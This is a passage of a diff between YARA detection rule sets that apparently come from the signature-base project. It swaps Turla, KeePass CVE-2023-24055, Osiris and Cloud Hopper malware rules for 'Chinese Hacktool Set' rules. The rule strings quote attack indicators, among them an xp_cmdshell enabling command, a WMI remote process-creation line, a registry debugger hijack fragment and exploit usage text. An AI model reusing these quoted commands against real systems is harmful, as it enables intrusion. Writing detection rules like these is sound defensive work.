-		$c5 = "snowsmooth.com" ascii
-		$c6 = "goodre.net" ascii
-		$c7 = "gloflabs.com" ascii
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+		$s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii
+		$s3 = "\\svchost.exe -k " ascii
+		$s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii
+		$s9 = "Global\\%s-key-event" fullword ascii
+		$s10 = "%d%d.exe" fullword ascii
+		$s14 = "%d.exe" fullword ascii
+		$s15 = "Global\\%s-key-metux" fullword ascii
+		$s18 = "GET / HTTP/1.1" fullword ascii
+		$s19 = "\\Services\\" ascii
+		$s20 = "qy001id=%d;qy001guid=%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 1 of ( $c* ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1 : FILE
+rule SIGNATURE_BASE_HKTL_CN_Dos_Sys : FILE
 {
 	meta:
-		description = "Detects Turla Linux malware x64 x32"
-		author = "Leonardo S.p.A."
-		id = "2da75433-b1c1-51b3-8f7a-a4442ca3de96"
-		date = "2020-04-24"
-		modified = "2023-12-05"
-		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_penquin.yar#L2-L33"
+		description = "Chinese Hacktool Set - file sys.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c4b740f2-f4f8-59ff-ad1f-c06718040b50"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "Dos_sys"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L860-L878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e07963c492f1e6264f01ee292e40b188ca325b76005d9d48e6dc198cb9bdcf4"
+		hash = "b5837047443f8bc62284a0045982aaae8bab6f18"
+		logic_hash = "3b3f55c45ebfe4ab6d8e6b06a3c452c84d4f755f984d913c683a49a8fd570d9d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
-		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
-		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
-		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
-		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
-		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
-		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "/root/.hsperfdata" ascii fullword
-		$ = "Desc| Filename | size |state|" ascii fullword
-		$ = "VS filesystem: %s" ascii fullword
-		$ = "File already exist on remote filesystem !" ascii fullword
-		$ = "/tmp/.sync.pid" ascii fullword
-		$ = "rem_fd: ssl " ascii fullword
-		$ = "TREX_PID=%u" ascii fullword
-		$ = "/tmp/.xdfg" ascii fullword
-		$ = "__we_are_happy__" ascii
-		$ = "/root/.sess" ascii fullword
+		$s0 = "'SeDebugPrivilegeOpen " fullword ascii
+		$s6 = "Author: Cyg07*2" fullword ascii
+		$s12 = "from golds7n[LAG]'J" fullword ascii
+		$s14 = "DAMAGE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1_Opcode : FILE
+rule SIGNATURE_BASE_HKTL_CN_Dat_Xpf : FILE
 {
 	meta:
-		description = "Detects Turla Linux malware x64 x32"
-		author = "Leonardo S.p.A."
-		id = "03043f59-c81a-5423-bec1-6cd88f6e3c52"
-		date = "2020-04-24"
-		modified = "2023-12-05"
-		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_penquin.yar#L35-L66"
+		description = "Chinese Hacktool Set - file xpf.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fe2de535-4f86-5c29-b67e-153423a897f7"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "dat_xpf"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L880-L897"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19524e6ec3b0d49ff9c85ce361ef1922b92e4f7876ddb7d6c9b209b5357080e3"
+		hash = "761125ab594f8dc996da4ce8ce50deba49c81846"
+		logic_hash = "c46b10ef17a9fee2be15fc9cc8b8aeec94d656b86e7208e1ad1f5efcd95fddf5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
-		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
-		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
-		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
-		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
-		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
-		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op0 = { 8D 41 05 32 06 48 FF C6 88 81 E0 80 69 00 }
-		$op1 = { 48FFC14883F94975E9 }
-		$op2 = { C7 05 9B 7D 29 00 1D 00 00 00 C7 05 2D 7B 29 00 65 74 68 30 C6 05 2A 7B 29 00 00 E8 }
-		$op3 = { BF FF FF FF FF E8 96 9D 0A 00 90 90 90 90 90 90 90 90 90 90 89 F0}
-		$op4 = { 88D380C305329AC1D60C08889A60A10F084283FA0876E9 }
-		$op5 = { 8B 8D 50 DF FF FF B8 09 00 00 00 89 44 24 04 89 0C 24 E8 DD E5 02 00 }
-		$op6 = { 8D 5A 05 32 9A 60 26 0C 08 88 9A 20 F4 0E 08 42 83 FA 48 76 EB }
-		$op7 = { 8D 4A 05 32 8A 25 26 0C 08 88 8A 20 F4 0E 08 42 83 FA 08 76 EB}
+		$s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii
+		$s2 = "\\Device\\XScanPF" wide
+		$s3 = "\\DosDevices\\XScanPF" wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
+rule SIGNATURE_BASE_HKTL_CN_Project1 : FILE
 {
 	meta:
-		description = "Detects suspicious entries in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
+		description = "Chinese Hacktool Set - file Project1.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c031919-da19-5fd0-b21a-2e83679ad1e3"
-		date = "2023-01-25"
-		modified = "2023-12-05"
-		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_keepass_cve_2023_24055.yar#L2-L20"
+		id = "12cc7a82-d7a9-58c6-b283-3bb0df477cd8"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "Project1"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L899-L916"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ca00f317838819bb7fb80c9d00d94db498e1d3ef146b9af2664dae09302a86d"
+		hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
+		logic_hash = "c26590f13a185eb42a27d27e6b5996f7fdf4d5c146fb74062686f356ec4db47d"
 		score = 75
-		quality = 81
-		tags = "CVE-2023-24055, FILE"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
-		$x1 = "<Parameter>KeePass XML (2.x)</Parameter>"
-		$x2 = "::ReadAllBytes("
-		$x3 = " -Method "
-		$x4 = " bypass "
-		$x5 = "powershell" nocase ascii wide fullword
+		$s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii
+		$s2 = "Password.txt" fullword ascii
+		$s3 = "LoginPrompt" fullword ascii
 
 	condition:
-		filesize < 200KB and $a1 and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
+rule SIGNATURE_BASE_Arp_EMP_V1_0 : FILE
 {
 	meta:
-		description = "Detects suspicious triggers defined in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
+		description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ff1a93f-f7f0-528d-9e07-402e321a0ffe"
-		date = "2023-01-25"
+		id = "b2552f26-47ac-5fa0-941e-d674f9deccac"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_keepass_cve_2023_24055.yar#L22-L37"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L918-L931"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4ed3eee86baf3dddfe423795491a5a94c02df3f4a7525efa6f2436e19197e55b"
-		score = 60
+		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
+		logic_hash = "e46b0f730945dad3c75b6865f30005f4d5fa09c53e3a27c275ca22da9cc89e8d"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-24055, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
-		$s1 = "<Action>" ascii wide
-		$s2 = "<Parameter>" ascii wide
+		$s0 = "Arp EMP v1.0.exe" fullword wide
 
 	condition:
-		filesize < 200KB and $a1 and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Invoke_Osiris : FILE
+rule SIGNATURE_BASE_CN_Tools_Myupnp : FILE
 {
 	meta:
-		description = "Osiris Device Guard Bypass - file Invoke-OSiRis.ps1"
-		author = "Florian Roth"
-		id = "ee1a7e10-ffca-58d2-b01f-7444468ceb3c"
-		date = "2017-03-27"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps_osiris.yar#L10-L26"
+		description = "Chinese Hacktool Set - file MyUPnP.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "394e19d3-882e-5a7c-a3a0-e662bd67955c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L933-L948"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a93308d6595de647a96716df0799ec690d91b2fb87e0b4a2f47e6b8b52eed97"
-		score = 70
+		hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"
+		logic_hash = "0bdd0d98dc5218bbe799e5e510c5f27d74a1ef398b09962f4267f846088f726e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "$null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target" ascii wide
-		$x3 = "-Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}" ascii wide
-		$x4 = "Device Guard Bypass Command Execution" ascii wide
+		$s1 = "<description>BYTELINKER.COM</description>" fullword ascii
+		$s2 = "myupnp.exe" fullword ascii
+		$s3 = "LOADER ERROR" fullword ascii
 
 	condition:
-		filesize < 8MB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_1 : FILE
+rule SIGNATURE_BASE_CN_Tools_Shiell : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file Shiell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "28ca64ac-beee-51d9-96d4-a1f6d52823ec"
-		date = "2017-04-03"
+		id = "7ac7d79d-3f4e-54e7-bb97-ce94cbbb40a2"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L10-L26"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L950-L966"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e024767797fb146b92d6e8c549597c0cda7c2f8fb961299a3808b9b2e924666"
+		hash = "b432d80c37abe354d344b949c8730929d8f9817a"
+		logic_hash = "44c494c24c090b21c3c201d57f910e8f4d5132a863715a090fa1e18c9d349d48"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27876dc5e6f746ff6003450eeea5e98de5d96cbcba9e4694dad94ca3e9fb1ddc"
 
 	strings:
-		$s1 = "zok]\\\\\\ZZYYY666564444" fullword ascii
-		$s2 = "z{[ZZYUKKKIIGGGGGGGGGGGGG" fullword ascii
-		$s3 = "EEECEEC" fullword ascii
-		$s4 = "IIEFEE" fullword ascii
+		$s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
+		$s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide
+		$s3 = "Shift shell.exe" fullword wide
+		$s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and 2 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_2 : FILE
+rule SIGNATURE_BASE_Cndcom_Cndcom : FILE
 {
 	meta:
-		description = "Detects Operation CloudHopper malware samples"
+		description = "Chinese Hacktool Set - file cndcom.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c0a3d68-5f6b-5491-b0c2-94e8cff478d1"
-		date = "2017-04-03"
-		modified = "2023-01-06"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L28-L57"
+		id = "b1acfe34-03b8-5909-a226-3325fe8629ab"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L968-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dff8623c35c83c20fb525209ec9aa5d77b51fa494eb557845a8320c77746c02f"
-		score = 90
+		hash = "08bbe6312342b28b43201125bd8c518531de8082"
+		logic_hash = "226be7ea7b09b2b87eeec006c8054b9fb59eb8324def14a4a0db97f94fb39d62"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "sERvEr.Dll" fullword ascii
-		$x2 = "ToolbarF.dll" fullword wide
-		$x3 = ".?AVCKeyLoggerManager@@" fullword ascii
-		$x4 = "GH0STCZH" ascii
-		$s1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword wide
-		$s2 = "rundll32.exe \"%s\", UnInstall /update %s" fullword wide
-		$s3 = "\\Release\\Loader.pdb" ascii
-		$s4 = "%s\\%x.dll" fullword wide
-		$s5 = "Mozilla/4.0 (compatible)" fullword wide
-		$s6 = "\\syslog.dat" wide
-		$s7 = "NSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$op1 = { 8d 34 17 8d 49 00 8a 14 0e 3a 14 29 75 05 41 3b }
-		$op2 = { 83 e8 14 78 cf c1 e0 06 8b f8 8b c3 8a 08 84 c9 }
-		$op3 = { 3b fb 7d 3f 8a 4d 14 8d 45 14 84 c9 74 1b 8a 14 }
+		$s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii
+		$s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii
+		$s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii
+		$s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii
+		$s5 = "Windows NT SP6 (Chinese)" fullword ascii
+		$s6 = "- Original code by FlashSky and Benjurry" fullword ascii
+		$s7 = "\\C$\\123456111111111111111.doc" wide
+		$s8 = "shell3all.c" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) or all of ( $op* ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_3 : FILE
+rule SIGNATURE_BASE_Isdebug_V1_4 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad1d3b48-d48c-5011-ac51-c8047e1ee8ed"
-		date = "2017-04-03"
+		id = "f9b4a909-e0e5-5708-8794-39250b9d56cc"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L59-L79"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L990-L1010"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d15b4c277e2c4dfe300f242e4cc9b217981166191a47939ca437c55391874b5d"
+		hash = "ca32474c358b4402421ece1cb31714fbb088b69a"
+		logic_hash = "d656327c33533b5ef7dc70ec00250ee35d878794fae189829a0ecad958f96616"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d"
 
 	strings:
-		$s6 = "operator \"\" " fullword ascii
-		$s7 = "zok]\\\\\\ZZYYY666564444" fullword ascii
-		$s11 = "InvokeMainViaCRT" fullword ascii
-		$s12 = ".?AVAES@@" fullword ascii
-		$op1 = { b6 4c 06 f5 32 cf 88 4c 06 05 0f b6 4c 06 f9 32 }
-		$op2 = { 06 fc eb 03 8a 5e f0 85 c0 74 05 8a 0c 06 eb 03 }
-		$op3 = { 7e f8 85 c0 74 06 8a 74 06 08 eb 03 8a 76 fc 85 }
+		$s0 = "IsDebug.dll" fullword ascii
+		$s1 = "SV Dumper V1.0" fullword wide
+		$s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii
+		$s8 = "Error WriteMemory failed" fullword ascii
+		$s9 = "IsDebugPresent" fullword ascii
+		$s10 = "idb_Autoload" fullword ascii
+		$s11 = "Bin Files" fullword ascii
+		$s12 = "MASM32 version" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( all of ( $s* ) and 1 of ( $op* ) ) or all of ( $op* ) ) or ( 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Dropper_1 : FILE
+rule SIGNATURE_BASE_HTTPSCANNER : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b43ffb7e-1643-5560-8719-9c63582920e7"
-		date = "2017-04-03"
+		id = "470c90f5-bb98-59ab-bff4-f6238c318e36"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L81-L94"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1012-L1026"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee0caf8a08db9a2a83f10178e2ee890b6b0bc6e699ebb3d01fa94fa48c6dfdee"
+		hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"
+		logic_hash = "0f1460101198d8b139b7cc0674bef2fc7b3d2a24249f521396b7bbe4318a83d5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "411571368804578826b8f24f323617f51b068809b1c769291b21125860dc3f4e"
 
 	strings:
-		$s1 = "{\\version2}{\\edmins0}{\\nofpages1}{\\nofwords11}{\\nofchars69}{\\*\\company google}{\\nofcharsws79}{\\vern24611}{\\*\\password" ascii
+		$s1 = "HttpScanner.exe" fullword wide
+		$s2 = "HttpScanner" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5c7b and filesize < 700KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3500KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_4 : FILE
+rule SIGNATURE_BASE_Hscan_V1_20_Pipecmd : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file PipeCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebc810e6-f549-5401-9ee9-331888eda127"
-		date = "2017-04-03"
-		modified = "2023-01-06"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L96-L112"
+		id = "957a8e3b-5f6c-5f3e-8973-88259c9cb0dc"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1028-L1049"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b39531e4af93ab026381a1114efe00fa01fb45860ddb512dbfa436471644e20"
+		hash = "64403ce63b28b544646a30da3be2f395788542d6"
+		logic_hash = "91ed275896c2520893ba1af26b2563c0bd3564a9c5f9d812f35464469e27307b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ae6b45a92384f6e43672e617c53a44225e2944d66c1ffb074694526386074145"
 
 	strings:
-		$s6 = "operator \"\" " fullword ascii
-		$s9 = "InvokeMainViaCRT" fullword ascii
-		$s10 = ".?AVAES@@" ascii
+		$s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii
+		$s2 = "PipeCmd.exe" fullword wide
+		$s3 = "Please Use NTCmd.exe Run This Program." fullword ascii
+		$s4 = "%s\\pipe\\%s%s%d" fullword ascii
+		$s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
+		$s7 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s8 = "Connecting to Remote Server ...Failed" fullword ascii
+		$s9 = "PIPECMDSRV" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_5 : FILE
+rule SIGNATURE_BASE_Dos_Fp : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file fp.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1ad189f8-a4c2-5f56-beec-a55bd516ad8d"
-		date = "2017-04-03"
+		id = "f4427aab-50c3-5bb9-997a-75e162a83f8a"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L114-L134"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1051-L1067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b91ac8f450843c7c85e8d056218aff671bb0f345d16a7ba3f4180ac008bf318"
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+		logic_hash = "cc09743269ee36862c95c9323ad271ca9b6c350cf25163d126fef0f86bc6f671"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01"
 
 	strings:
-		$x1 = "CWINDOWSSYSTEMROOT" fullword ascii
-		$x2 = "YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK" fullword ascii
-		$x3 = "NJK_JK_SED_PNJHGFUUGIOO_PIY" fullword ascii
-		$x4 = "c_VDGQBUl}YSB_C_VDlqSDYFU" fullword ascii
-		$s7 = "FALLINLOVE" fullword ascii
-		$op1 = { 83 ec 60 8d 4c 24 00 e8 6f ff ff ff 8d 4c 24 00 }
